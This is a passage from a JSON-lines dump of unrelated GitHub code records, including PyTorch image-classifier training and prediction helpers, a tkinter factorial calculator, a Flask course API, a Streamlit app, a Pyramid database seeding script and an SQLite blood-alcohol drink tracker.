logits\n probs = torch.nn.functional.softmax(outputs, dim=1) # Get the probabilities for the output logits like the criterion\n predictions = probs.max(dim=1) # Get the max value indexes across the probabilities vectors (batch_size, vector_of_probabilities)\n\n # Check the accuracy of the predictions against labels\n # Equality is a byte tensor that needs to be converted to a float tensor\n equality = labels.data == predictions[1]\n val_accuracy += equality.type(torch.FloatTensor).mean()\n\n # Calculate the error\n loss = criterion(outputs, labels)\n val_loss += loss.item() # Get a scaler value from pytorch tensor\n\n return val_loss, val_accuracy\n\ndef train(model, train_data, val_data, optimizer, epochs, gpu):\n \"\"\"\n Trains a PyTorch model.\n\n Args:\n model: pytorch model\n train_data: training data (Dataloader object)\n val_data: validation data\n optimizer: pytorch optimizer to be used with the model\n epochs: number of training loops (int)\n gpu: train on gpu (bool)\n\n Returns:\n A trained version of the model passed in\n \"\"\"\n\n # Loss function\n criterion = torch.nn.CrossEntropyLoss() # This criterion combines nn.LogSoftmax() and nn.NLLLoss() in one single class\n\n # Train on a gpu or cpu depending on settings\n device = torch.device(\"cuda:0\" if gpu==True else \"cpu\")\n model.to(device)\n\n print(\"Starting training...\")\n\n # Loop over training data\n for epoch in range(epochs - 1):\n # Make sure the model is in training mode\n model.train()\n # Keep track of the loss between training batches\n running_loss = 0\n\n # Loop through the training data in batches\n for images, labels in train_data:\n # Send the training data to the designated device for computation\n images, labels = images.to(device), labels.to(device)\n\n # Zero out gradients for the next training pass\n optimizer.zero_grad()\n\n # Forward pass\n try:\n outputs = model.forward(images)\n except ValueError:\n # Inception V3 is probably being used, use inceptions logits and not aux_logits,\n # Inception is unique in this regard\n outputs, _ = model.forward(images)\n\n # Calculate the error\n loss = criterion(outputs, labels)\n running_loss += loss.item() # Get scaler value from pytorch tensor\n\n # Backprop the error and calculate the gradients for each layer\n loss.backward()\n\n # Update the weights to adjust for the error based on the gradients\n optimizer.step()\n\n # Evaluate the model to check progress\n with torch.no_grad(): # Turn off gradients to speed up inference\n # Change model to evaluation mode for inference\n model.eval()\n # Evaluate the model accuracy after adjusting the weights\n val_loss, val_accuracy = validation(model, val_data, criterion, device)\n\n # Print results per epoch\n print(\"Epoch: {0}/{1} | Training Error: {2:.2f} | Validation Error: {3:.2f} | Validation Accuracy: {4:.2f}%\".format(epoch + 1,\n epochs,\n running_loss,\n val_loss,\n val_accuracy/len(val_data)*100))\n\n print(\"Training complete!\")\n return model\n\ndef save(model, arch, class_to_idx, cat_to_name, save_dir):\n \"\"\"\n Saves a trained model and associated information into a checkpoint that can\n be loaded and used later.\n\n Args:\n model: trained pytorch model\n arch: PyTorch architecture to be used for transfer learning (string)\n class_to_idx: class to index mapping via ImageFolderDataset.class_to_idx\n cat_to_name: class:name dict mappings\n save_dir: directory to save the checkpoint (string)\n\n Returns:\n None\n \"\"\"\n\n print(\"Saving model\")\n\n # Save the mapping of classes to indices\n model.class_to_idx = class_to_idx\n model.name = arch\n # Create a checkpoint with useful information about the model\n checkpoint = {'transfer_learning_model': model.name,\n 'model': model,\n 'class_to_idx': model.class_to_idx,\n 'classes': cat_to_name,\n 'pytorch_version': '0.4.0'}\n\n # Save the checkpoint in the project directory\n torch.save(checkpoint, os.path.join(save_dir, model.name + '_checkpoint.pth'))\n print(\"Model saved!\")\n\n# <---train.py end--->\n\n# <---predict.py start--->\ndef load_checkpoint(filepath, gpu):\n \"\"\"\n Loads a PyTorch checkpoint on to the desired compute device,\n as long as the compute device is available.\n IE: CUDA enabled GPUs\n\n Args:\n filepath: path to a PyTorch checkpoint (string)\n gpu: use gpu (bool)\n\n Returns:\n Pytorch model and the checkpoint dict as a tuple\n \"\"\"\n\n # https://pytorch.org/docs/stable/torch.html?highlight=torch%20load#torch.load\n # https://discuss.pytorch.org/t/on-a-cpu-device-how-to-load-checkpoint-saved-on-gpu-device/349/3\n checkpoint = torch.load(filepath, map_location=lambda storage, loc: storage.cuda(0) if gpu and torch.cuda.is_available() else storage)\n model = checkpoint['model']\n\n return model, checkpoint\n\ndef process_image(image_path, model):\n \"\"\"\n Scales, crops, and normalizes a PIL image for a PyTorch model,\n returns a Pytorch tensor.\n\n Args:\n image_path: path to an image\n model: pytorch model to be used\n\n Returns:\n PyTorch tensor ready to be fed into a model\n \"\"\"\n\n # Determine the min image size for diffrent classifier models\n if model.name == 'inception_v3': # Inception needs 299px despite documentation listing 224px\n # Minimum image size required by the network (Inception V3 needs 299px instead of 224px)\n shortest_side = (326, 326)\n min_image_size = 299\n else:\n shortest_side = (256, 256)\n min_image_size = 224\n\n\n im = Image.open(image_path)\n im.thumbnail(shortest_side) # Resize while maintaining aspect ratio\n\n # Find the center of the image and crop based on width and height\n width, height = im.size\n\n # Find the cartesian coordinates for cropping center\n left = (width - min_image_size)//2\n top = (height - min_image_size)//2\n right = (width - min_image_size)//2 + min_image_size\n bottom = (height - min_image_size)//2 + min_image_size\n\n # Crop center of the image to (229px x 229px)\n im = im.crop((left, top, right, bottom))\n\n # Convert to numpy array to normalize\n np_image = np.array(im)\n # print(\"Original pixel mean: {}\".format(np_image.mean()))\n\n # Scale the image RGB values from (0 - 255) --> (0.0 - 1.0)\n np_image = np_image / 255\n # print(\"Rescaled pixel mean: {}\".format(np_image.mean()))\n # print(\"-\" *40)\n\n # PyTorch model normalization and standard deviation values\n # https://pytorch.org/docs/stable/torchvision/models.html\n means = np.array([0.485, 0.456, 0.406])\n stds = np.array([0.229, 0.224, 0.225])\n np_image = (np_image - means) / stds # Normalize\n # print(\"Normalized pixel mean: {}\".format(np_image.mean()))\n # print(\"-\" *40)\n\n # Transpose the positions of the array to D, H, W like pytorch tensors\n # print(\"Old shape: {}\".format(np_image.shape))\n np_image = np_image.transpose(2, 0, 1)\n # print(\"New shape: {}\".format(np_image.shape))\n\n # Convert to pytorch tensor\n torch_tensor_image = torch.from_numpy(np_image)\n\n # Cast to FloatTensor from DoubleTensor to match weight dtype for predictions\n torch_tensor_image = torch_tensor_image.type(torch.FloatTensor)\n\n return torch_tensor_image\n\ndef predict(image_path, model, gpu, topk, cat_to_name=None):\n \"\"\"\n Predict the class (or classes) of an image using a trained model.\n\n Args:\n image_path: path to an image for inference (string)\n model: trained model to be used (PyTorch model)\n gpu: use gpu (bool)\n topk: number of classes/ labels to output (int)\n cat_to_name: file containing class to label mappings (json file)\n\n Returns:\n None\n \"\"\"\n\n # Make sure the model is in evaluation mode, send to process device\n model.eval()\n device = torch.device(\"cuda:0\" if gpu==True else \"cpu\")\n model.to(device)\n\n # Preprocess the image for the network, convert to pytorch tensor, send to process device\n image = process_image(image_path, model)\n image.unsqueeze_(0) # Add the \"batch_size\" at position 0 in the tensor, IE: (1, D, H, W), this is required for single images\n image = image.to(device)\n\n # Turn off gradients and make a forward pass\n with torch.no_grad():\n outputs = model.forward(image)\n\n # Get the probabilities with the corresponding indexes\n probs = torch.nn.functional.softmax(outputs, dim=1)\n probs, idxs = probs.topk(topk)\n\n # Invert the class_to_index dictionary to use the topk indexes to look up dataset class numbers\n # from the ImageFolder class/index mappings\n # IE: {class_number:index_value} --> {index_value:class_number}\n idx_to_class = dict(map(reversed, model.class_to_idx.items()))\n\n # If topk is greater then 1 we have a list\n if topk > 1:\n # Map the indexes to the correct classes and make a python list\n classes = [idx_to_class[idx] for idx in idxs.squeeze_().tolist()]\n # Convert from pytorch tensor to python list\n probs = probs.squeeze_().tolist()\n # If topk is less then 2 we are no longer working with a list, just a single value\n elif topk < 2:\n classes = idx_to_class[idxs.squeeze_().item()]\n probs = probs.squeeze_().item()\n\n # Return the real name labels instead of classes\n if cat_to_name is not None and topk > 1:\n names = get_category_names(cat_to_name)\n classes = [names[i] for i in classes]\n elif cat_to_name is not None and topk < 2:\n names = get_category_names(cat_to_name)\n classes = names[classes]\n\n print(\"Probs: {} Classes: {}\".format(probs, classes))\n# <---predict.py end--->","repo_name":"Fury1/Deep-Learning-with-Python-and-Pytorch","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":17753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13618392320","text":"#Calcula factorial pro max 4k no fake 1 link mega\n#Nicolas Escandon Varela 2205629\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import simpledialog\n\ndef principal():\n r = messagebox.askyesno(message=\"¿Quieres calcular un factorial?\", title=\"uwu\")\n while r == True:\n numero1 = simpledialog.askinteger(\"\", \"Digite un numero\")\n \n total_factorial = calcularFactorial(numero1)\n \n\n reporteT.config(state=\"normal\")\n reporteT.insert(INSERT, str(numero1) + \"!\" + \" = \" + total_factorial +\"\\n\")\n reporteT.config(state=\"disable\")\n\n r = messagebox.askyesno(message=\"¿Quieres calcular otro factorial?\", title=\"uwu\")\n\ndef calcularFactorial(numero1):\n if numero1 <0:\n numero1 = abs(numero1)\n x = 0\n total_factor = 1\n for x in range(1, numero1+1, 1):\n total_factor = total_factor * x\n\n return \"-\" + str(total_factor)\n else:\n x = 0\n total_factor = 1\n for x in range(1, numero1+1, 1):\n total_factor = total_factor * x\n\n return str(total_factor) \n\ndef salir():\n raiz.destroy()\n\ndef borrar():\n reporteT.config(state=\"normal\")\n reporteT.delete(\"1.0\",\"end\")\n reporteT.config(state=\"disable\")\n\nraiz = Tk()\nraiz.geometry(\"450x260\")\nraiz.title(\"Programa que calcula factorial\")\n\n\nmarco1 = Frame(raiz)\nmarco1.config(bd=3, relief=\"sunken\")\nmarco1.pack(pady=10)\niniciarB = Button(marco1, text=\"Iniciar\", command = principal)\niniciarB.grid(row=0,column=0,padx=3, pady=3)\nsalirB = Button(marco1, text=\"Salir\", command=salir)\nsalirB.grid(row=0,column=1,padx=3, pady=3)\nborrarB = Button(marco1, text=\"Borrar\", command=borrar)\nborrarB.grid(row=0,column=2,padx=3, pady=3)\n\n\nmarco2 = LabelFrame(raiz, text=\"Resultados\")\nmarco2.config(bd=3, relief=\"sunken\")\nmarco2.pack()\nreporteT = Text(marco2)\nreporteT.config(state=\"disable\", width=50, height=10)\nreporteT.grid(row=0, column=0)\n\nraiz.mainloop()\n","repo_name":"NEV117/cosas-de-python","sub_path":"Calculadora Factorial Robusta.py","file_name":"Calculadora Factorial Robusta.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25262336924","text":"from flask_restful import Resource, reqparse, abort\r\n\r\ncourses_post_args = reqparse.RequestParser()\r\ncourses_post_args.add_argument(\r\n \"title\", type=str, help=\"Title of the course is required.\", required=True)\r\ncourses_post_args.add_argument(\r\n \"description\", type=str, help=\"Description of the course is required.\", required=True)\r\ncourses_post_args.add_argument(\r\n \"teacher\", type=str, help=\"Teacher of the course is required.\", required=True)\r\n\r\ncourses = []\r\n\r\n\r\ndef getCourseById(courseId):\r\n for course in courses:\r\n if(str(course[\"id\"]) == str(courseId)):\r\n return course\r\n return False\r\n\r\n\r\ndef abortIfCourseDoesNotExist(courseId):\r\n if (getCourseById(courseId) == False):\r\n abort(404, message=\"A course with that ID does not exist...\")\r\n\r\n\r\ndef abortIfCourseExists(courseId):\r\n if(getCourseById(courseId)):\r\n abort(409, message=\"A course with that ID already exists...\")\r\n\r\n\r\nclass Courses(Resource):\r\n def get(self, courseId):\r\n abortIfCourseDoesNotExist(courseId)\r\n return getCourseById(courseId)\r\n\r\n def post(self, courseId):\r\n abortIfCourseExists(courseId)\r\n\r\n args = courses_post_args.parse_args()\r\n\r\n newCourse = dict({\r\n \"id\": courseId,\r\n **args\r\n })\r\n courses.append(newCourse)\r\n return {\"message\": \"Course successfully created!\"}\r\n","repo_name":"rachzy/video-creator","sub_path":"server/Routers/Courses/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27945187061","text":"# Сформировать (не программно) текстовый файл.\r\n# В нём каждая строка должна описывать учебный предмет и наличие лекционных, практических и лабораторных занятий по\r\n# предмету. Сюда должно входить и количество занятий. Необязательно, чтобы для каждого предмета были все типы занятий.\r\n# Сформировать словарь, содержащий название предмета и общее количество занятий по нему. Вывести его на экран.\r\n# Примеры строк файла: Информатика: 100(л) 50(пр) 20(лаб).\r\n# Физика: 30(л) — 10(лаб)\r\n# Физкультура: — 30(пр) —\r\n# Пример словаря: {“Информатика”: 170, “Физика”: 40, “Физкультура”: 30}\r\n\r\n# Импортируем работы с аргументами и именами частей файла\r\nfrom sys import argv\r\n\r\n\r\ndef process_file(input_file_name):\r\n # создаем словарь предметов, где предмет - ключ, а значение - общее число занятий\r\n out_list = {}\r\n\r\n try:\r\n\r\n # Открываем файл на чтение\r\n file_obg = open(input_file_name, 'r', encoding='utf-8')\r\n\r\n # обходим все строки в файле по следующей схеме\r\n # сначал строку делим по знаку ':' - получаем предмет и часы\r\n # часы делим по пробелам, а дальше отсекаем число до скобки\r\n for file_line in file_obg:\r\n\r\n think_data = file_line.split(':')\r\n # предмет\r\n think_name = think_data[0].replace('\\ufeff', '')\r\n exist_hours = out_list.get(think_name)\r\n # часы\r\n hours = think_data[1].split()\r\n for el in hours:\r\n kind = el.split('(')\r\n if exist_hours is None:\r\n exist_hours = int(kind[0])\r\n else:\r\n exist_hours += int(kind[0])\r\n\r\n out_list.update({think_name: exist_hours})\r\n\r\n print(out_list)\r\n\r\n except IOError:\r\n # в случае ошибки ввода вывода - сообщаем\r\n print(\"Ошибка ввода-вывода в файл\")\r\n\r\n except ValueError:\r\n # в случае если аргументов мало - сообщаем\r\n exit(\"Файл данных содержит ошибку\")\r\n\r\n finally:\r\n # не забываем закрывать файл\r\n file_obg.close()\r\n\r\n\r\n# Получаем из командной строки путь к файлу, выработку в часах, ставку за час, премию\r\ntry:\r\n name, input_file = argv\r\n print(f'input : {input_file}')\r\n\r\n process_file(input_file)\r\n\r\nexcept ValueError:\r\n # в случае если аргументов мало - сообщаем\r\n exit(\"Необходимо указать имя входного файла как первый параметр строки запуска скрипта\")\r\n","repo_name":"guyseptimiy/Lesson5","sub_path":"Lesson-05-Task-06.py","file_name":"Lesson-05-Task-06.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30421270039","text":"class LocationBuilder:\n def __init__(self, rows, cols):\n self.rows = rows\n self.cols = cols\n self.location = self.create_location()\n\n def create_location(self):\n location = {}\n for r in range(self.rows):\n row = {}\n for c in range(self.cols):\n row[c] = Cell()\n location[r] = row\n return location\n","repo_name":"beLIEveMePLz/Your-choice-Ren-py-by-ChatGPT-","sub_path":"Systems/Location Editor/automation 0.4.3.py","file_name":"automation 0.4.3.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71796454520","text":"import streamlit as st\n\n# Set the page config at the very top of your script\nst.set_page_config(page_title=\"Squire\", page_icon=\"Squire_GPT/ASSETS/pixel_pencil.png\", layout='wide')\n\nfrom chatUI import chatbot_ui_page\nfrom SpearHead_Library import spearhead_library\n\ndef main():\n st.sidebar.title(\"Navigation\")\n selection = st.sidebar.radio(\"Go to\", [\"Home\", \"Brain_Storm\", \"SpearHead_Library\"])\n\n if selection == \"Home\":\n home_page()\n elif selection == \"Brain_Storm\":\n chatbot_ui_page()\n elif selection == \"SpearHead_Library\":\n spearhead_library()\n \n\ndef home_page():\n st.title(\"Welcome to Squire :scales:\")\n \n st.write(\"On the sidebar you can select between the Brain_Storm tool of the SpearHead_Library tool.\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Madlittledude/Squire_1","sub_path":"Squire_GPT/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37896467992","text":"from buddy.models.properties_model import State, PropertyCategory\nfrom buddy.models.properties_model import Feature_types,Features\nfrom buddy.models.user_model import User_types, Users, Groups\nfrom buddy.models.blogs_model import BlogCategory\nfrom buddy.models.q_model import QCategory, Questions, Answers\n#from buddy.models.city_model import FeatureToRate\n\nfrom buddy.models import DBSession\nimport transaction\n\n\ndef populate_userTypes():\n usertypes = [u'Buyer/Seller',u'Real Estate Developer/Builder',u'Real Estate Agent',u'Mortgage Lender',u'LandLord',\n u'Real Estate Broker',u'Property Manager',u'Other/just Looking']\n with transaction.manager:\n for name in usertypes:\n typs = User_types(\n name)\n DBSession.add(typs)\n\ndef populate_category():\n root_category_1 = PropertyCategory(name=u'Residential')\n #Adding subcategories for Residential,\n\n #PropertyCategory(u\"Multistorey Apartment/Flat\",parent=root_category_1)\n #PropertyCategory(u\"Story Apartment/Flat\", parent=root_category_1)\n PropertyCategory(u\"Flat\",parent=root_category_1)\n PropertyCategory(u\"Residential House\",parent=root_category_1)\n PropertyCategory(u\"Residential Land\", parent=root_category_1)\n #PropertyCategory(u\"Self-Contained/Studio House\",parent=root_category_1)\n #PropertyCategory(u\"Serviced Apartment\",parent=root_category_1)\n #PropertyCategory(u\"Penthouse\",parent=root_category_1)\n\n\n root_category_2 = PropertyCategory(name=u\"Commercial\")\n #Adding subcategories for commercial\n PropertyCategory(u\"Office space\",parent=root_category_2)\n PropertyCategory(u\"Commercial Shop\",parent=root_category_2)\n PropertyCategory(u\"Space in Shopping Mall\",parent=root_category_2)\n PropertyCategory(u\"Commercial Showroom\",parent=root_category_2)\n #PropertyCategory(u\"Business Centre\",parent=root_category_2)\n PropertyCategory(u\"Commercial Land\",parent=root_category_2)\n PropertyCategory(u\"Warehouse\",parent=root_category_2)\n PropertyCategory(u\"Guest House\",parent=root_category_2)\n PropertyCategory(u\"Hotel\",parent=root_category_2)\n PropertyCategory(u\"Hotel Sites\",parent=root_category_2)#land\n PropertyCategory(u\"Industrial Land\",parent=root_category_2)\n PropertyCategory(u\"Industrial Building\",parent=root_category_2)\n\n\n root_category_3 = PropertyCategory(name=u\"Agricultural\")\n #adding subcategories for Agricultural\n PropertyCategory(u\"Agricultural Land\",parent=root_category_3)\n PropertyCategory(u\"Farm House\",parent=root_category_3)\n\n with transaction.manager:\n DBSession.add_all([root_category_1, root_category_2, root_category_3])\n\n\ndef populate_location():\n states=[u\"Abuja\",u\"Abia\",u\"Anambra\",u\"Adamawa\",u\"Akwa Ibom\",u\"Bauchi\",u\"Benue\",\n u\"Bayelsa\",u\"Borno\",u\"Cross River\",u\"Enugu\",u\"Ebonyi\",u\"Edo\",u\"Ekiti\",u\"Delta\",\n u\"Gombe\",u\"Imo\",u\"Jigawa\",u\"Kebbi\",u\"Kogi\",u\"Kwara\",u\"Kano\",u\"Kaduna\",u\"Katsina\",\n u\"Lagos\",u\"Nasarawa\",u\"Niger\",u\"Osun\",u\"Ogun\",u\"Oyo\",u\"Ondo\",u\"Rivers\",u\"Plateau\",\n u\"Taraba\",u\"Sokoto\",u\"Yobe\",u\"Zamfara\"]\n with transaction.manager:\n for state in states:\n s = State(state)\n DBSession.add(s)\n\ndef add_blog_category():\n c1 = BlogCategory(name=u'Home selling')\n c2 = BlogCategory(name=u'Mortgage')\n c3 = BlogCategory(name=u'Rentals')\n c4 = BlogCategory(name=u'Local topics')\n c5 = BlogCategory(name=u'Home ownership')\n c6 = BlogCategory(name=u'Pro-to-pro')\n c7 = BlogCategory(name=u'Home buying')\n c8 = BlogCategory(name=u'Nairabricks Blogs')\n\n home_selling = [u'Selling process',u'Pricing',u'When to sell',\n u'Housing market', u'for sale by owner']\n mortgage = [u'mortgage rates',u'refinance',u'home equity loans',u'credit scores',\n u'approval process',u'mortgage types',u'loan modifications']\n rental = [u'rental market',u'finding a rental',u'Rental rights']\n local = [u'neighborhoods',u'market conditions',u'schools',u'crime',u'Parks and Recreation',u'Local Info']\n ownership = [u'home improvement',u'maintenance',u'taxes',u'insurance']\n pro = [u'agents',u'lenders',u'landlords',u'other pros',u'success stories']\n home_buying = [u'buying process',u'buying a foreclosure',u'rent vs buy',u'investing']\n nairabricks = [u'for sale listing',u'rental listing',u'Bugs & Suggestions',\n u'Discussion']\n with transaction.manager:\n for c in home_selling:\n q = BlogCategory(name=c,parent=c1)\n for c in mortgage:\n q = BlogCategory(name=c,parent=c2)\n for c in rental:\n q = BlogCategory(name=c,parent=c3)\n for c in local:\n q = BlogCategory(name=c,parent=c4)\n for c in ownership:\n q = BlogCategory(name=c,parent=c5)\n for c in pro:\n q = BlogCategory(name=c,parent=c6)\n for c in home_buying:\n q = BlogCategory(name=c,parent=c7)\n for c in nairabricks:\n q = BlogCategory(name=c,parent=c8)\n DBSession.add_all([c1,c2,c3,c4,c5,c6,c7,c8])\n'''\ndef add_Qcategory():\n c1 = QCategory(name=u'Home selling')\n c2 = QCategory(name=u'Mortgage')\n c3 = QCategory(name=u'Rentals')\n c4 = QCategory(name=u'Local topics')\n c5 = QCategory(name=u'Home ownership')\n c6 = QCategory(name=u'Pro-to-pro')\n c7 = QCategory(name=u'Home buying')\n c8 = QCategory(name=u'Nairabricks Questions')\n\n home_selling = [u'Selling process',u'Pricing',u'When to sell',\n u'Housing market', u'for sale by owner']\n mortgage = [u'mortgage rates',u'refinance',u'home equity loans',u'credit scores',\n u'approval process',u'mortgage types',u'loan modifications']\n rental = [u'rental market',u'finding a rental',u'Rental rights']\n local = [u'neighborhoods',u'market conditions',u'schools',u'crime',u'Parks and Recreation',u'Local Info']\n ownership = [u'home improvement',u'maintenance',u'taxes',u'insurance']\n pro = [u'agents',u'lenders',u'landlords',u'other pros',u'success stories']\n home_buying = [u'buying process',u'buying a foreclosure',u'rent vs buy',u'investing']\n nairabricks = [u'for sale listing',u'rental listing',u'Bugs & Suggestions',\n u'Discussion']\n with transaction.manager:\n for c in home_selling:\n q = QCategory(name=c,parent=c1)\n for c in mortgage:\n q = QCategory(name=c,parent=c2)\n for c in rental:\n q = QCategory(name=c,parent=c3)\n for c in local:\n q = QCategory(name=c,parent=c4)\n for c in ownership:\n q = QCategory(name=c,parent=c5)\n for c in pro:\n q = QCategory(name=c,parent=c6)\n for c in home_buying:\n q = QCategory(name=c,parent=c7)\n for c in nairabricks:\n q = QCategory(name=c,parent=c8)\n DBSession.add_all([c1,c2,c3,c4,c5,c6,c7,c8])\n'''\n\ndef populate_features():\n external = Feature_types(u'External Features')\n internal = Feature_types(u'Internal Features')\n eco = Feature_types(u'Eco Features')\n other = Feature_types(u'Other Features')\n\n oth = [u'Pets Allowed', u'Disability Features',u'Waterfront', u'Water View',\n u'Ocean View', u'River View',u'Hill/Mountain View', u'Development Projects']\n inter = [u'Alarm System', u'Intercom',u'Ensuite', u'Dishwasher',\n u'Built-in wardrobes', u'Ducted vacuum system',u'Gym', u'Indoor spa',\n u'Floorboards', u'Broadband internet available',u'Pay TV access', u'Fireplace',\n u'Ducted', u'heating', u'Ducted cooling',u'Split-system heating',\n u'Hydronic heating',u'Air conditioning', u'Gas heating',u'Lift']\n ext =[u'Carport', u'Garage',u'Open car spaces', u'Remote garage',\n u'Secure parking', u'Swimming pool',u'Tennis court', u'Balcony',\n u'Deck', u'Courtyard',u'Outdoor entertaining area', u'Fully fenced']\n ec = [u'Solar panels', u'Solar hot water',u'Water tank', u'Grey water system',\n u'High Energy efficiency rating', u'Medium Energy efficiency rating',\n u'Low - Energy efficiency rating']\n with transaction.manager:\n for c in inter:\n indoor = Features(name=c)\n DBSession.add(indoor)\n internal.features.append(indoor)\n for e in ext:\n outdoor = Features(name=e)\n DBSession.add(outdoor)\n external.features.append(outdoor)\n for i in ec:\n ecof = Features(name=i)\n DBSession.add(ecof)\n eco.features.append(ecof)\n for o in oth:\n othr = Features(name=o)\n DBSession.add(othr)\n other.features.append(othr)\n DBSession.add_all([external,internal,eco])\n transaction.commit()\n'''\ndef Populate_FeatureToRate():\n env = FeatureToRate(name=u'Environment')\n com = FeatureToRate(name=u'Commuting')\n place = FeatureToRate(name=u'Places of Interest')\n\n d = [u'Roads',u'Safety',u'Cleanliness',u'Neighborhood']\n c = [u'Public Transport',u'Parking',u'Connectivity',u'Traffic']\n e =[u'Schools',u'Restaurants',u'Hospital',u'Market']\n with transaction.manager:\n for i in d:\n enviro = FeatureToRate(name=i, parent=env)\n for i in c:\n come = FeatureToRate(name=i, parent=com)\n for i in e:\n s = FeatureToRate(name=i, parent=place)\n DBSession.add_all([env,com,place])\n transaction.commit()\n'''\n\ndef populate_superuser():\n admin = Users(\n firstname = u\"Ephraim\",\n surname = u\"Anierobi\",\n password = u\"mypassword\",\n email = u\"splendidzigy24@gmail.com\",\n company_name=u\"Zebraware Group Ltd\",\n prefix = u\"Zebraware\",\n email_verified = True\n )\n group1 = Groups(name=u\"superadmin\", description=u\"Last Admin\")\n group2 = Groups(name=u\"admin\", description=u\"Admin\")\n group3 = Groups(name=u\"supermod\",description=u\"Super moderator\")\n group4 = Groups(name=u\"mod\", description=u\"Moderator\")\n with transaction.manager:\n DBSession.add_all([group1,group2,group3,group4])\n admin.mygroups.append(group1)","repo_name":"FrankOdey/nairabricks","sub_path":"buddy/models/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":11233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32861204942","text":"import sqlite3\nimport time\n\nclass Drink():\n\tdef __init__(self,mass,gender,quantity,ABV,at_time,name):\n\t\tself.name = name\n\t\tself.mass = mass #in grams\n\t\tself.gender = gender\n\t\tself.quantity = quantity\n\t\tself.ABV = ABV\n\t\tself.at_time = at_time\n\t\tself.removed = False\n\n\tdef getCurrent(self):\n\t\t#A = self.grams_alcohol\n\t\tA = (self.quantity * (self.ABV/100.0)) * 23.35\n\t\tW = self.mass\n\t\tif self.gender == 'Female':\n\t\t\tR = 0.55\n\t\telse:\n\t\t\tR = 0.68\n\t\tH = (time.mktime(time.localtime()) - time.mktime(self.at_time)) / 3600\n\t\tBAC = (((A)/(W*R))*100)-(H*.015)\n\t\tval = str(BAC)\n\t\ttry:\n\t\t\tval = float(val[:7])\n\t\texcept:\n\t\t\tval = 0\n\t\tif val < 0:\n\t\t\treturn 0\n\t\tval = round(val*1000)/1000.0\n\t\treturn val\n\t\n\tdef getInitial(self):\n\t\t#A = self.grams_alcohol\n\t\tA = (self.quantity * (self.ABV/100.0)) * 23.35\n\t\tW = self.mass\n\t\tif self.gender == 'Female':\n\t\t\tR = 0.55\n\t\telse:\n\t\t\tR = 0.68\n\t\tH = (time.mktime(time.localtime()) - time.mktime(self.at_time)) / 3600\n\t\tBAC = (((A)/(W*R))*100)\n\t\tBAC = round(BAC*1000)/1000.0\n\t\treturn BAC\n\t\n\t\n\tdef __str__(self):\n\t\treturn \"{4}: {0} oz. of \\\"{3}\\\" at {1}% ABV added {2} to your BAC.\".format(\n\t\t\tself.quantity,\n\t\t\tself.ABV,\n\t\t\tself.getInitial(),\n\t\t\tself.name,\n\t\t\ttime.strftime(\"%H:%M:%S\",self.at_time))\n\ncreate_drink_table = \"\"\"\nCREATE TABLE IF NOT EXISTS drinks(\n\tdrink_id INT PRIMARY KEY,\n\tsession_id INT,\n\tdrinker_gender INT,\n\tdrinker_mass INT,\n\tdrink_quantity REAL,\n\tdrink_ABV REAL,\n\tdrink_name TEXT,\n\tdrink_removed INT);\"\"\"\n\ninsert_drink = \"\"\"INSERT INTO drinks VALUES(?,?,?,?,?,?,?,?)\"\"\"\n\nget_drink = \"\"\"SELECT * FROM drinks WHERE drink_id=?\"\"\"\n\nupdate_drink = \"\"\"UPDATE drinks SET\n\tdrinker_gender=?,\n\tdrinker_mass=?,\n\tdrink_quantity=?,\n\tdrink_ABV=?,\n\tdrink_name=?,\n\tdrink_removed=?\n\tWHERE drink_id=?\"\"\"\n\nget_sessions = \"SELECT DISTINCT session_id FROM drinks\"\n\nget_session = \"SELECT * FROM drinks WHERE session_id=?\"\n\nlast_session = \"SELECT session_id FROM drinks ORDER BY session_id DESC LIMIT 1\"\n\ndbname = '/drinks.db'\n\ndef Build_DB(location):\n\tcon = sqlite3.connect(location + dbname)\n\tc = con.cursor()\n\tc.execute(create_drink_table)\n\tcon.commit()\n\tc.close()\n\tcon.close()\n\ndef save(session_start,drink_list,location):\n\tBuild_DB(location)\n\tprint(\"Location:\", location)\n\tcon = sqlite3.connect(location+dbname)\n\tc = con.cursor()\n\tdrinks = {}\n\tprint(\"saving drinks\")\n\tfor drink in drink_list:\n\t\tremoved = 0\n\t\tif drink.removed:\n\t\t\tremoved = 1\n\t\t\t\n\t\tgender = 1\n\t\tif drink.gender == 'Male':\n\t\t\tgender = 0\n\t\t\n\t\tmass = drink.mass\n\t\toz = drink.quantity\n\t\tabv = drink.ABV\n\t\tname = drink.name\n\t\tdrink_id = time.strftime(\"%Y%m%d%H%M%S\",drink.at_time)\n\t\tprint(\"Saving drink: \", drink_id)\n\n\t\tc.execute(get_drink,(drink_id,))\n\t\ttry:\n\t\t\tif len(c.fetchall()) > 0:\n\t\t\t\tc.execute(update_drink,\n\t\t\t\t\t(gender,\n\t\t\t\t\tmass,\n\t\t\t\t\toz,\n\t\t\t\t\tabv,\n\t\t\t\t\tname,\n\t\t\t\t\tremoved,\n\t\t\t\t\tdrink_id))\n\t\t\telse:\n\t\t\t\tc.execute(insert_drink,\n\t\t\t\t\t(drink_id,\n\t\t\t\t\ttime.strftime(\"%Y%m%d%H%M%S\",session_start),\n\t\t\t\t\tgender,\n\t\t\t\t\tmass,\n\t\t\t\t\toz,\n\t\t\t\t\tabv,\n\t\t\t\t\tname,\n\t\t\t\t\tremoved))\n\t\t\tprint(\"saved drink: \", str(drink))\n\t\texcept sqlite3.IntegrityError as ie:\n\t\t\tprint(\"id collision. probably drink button 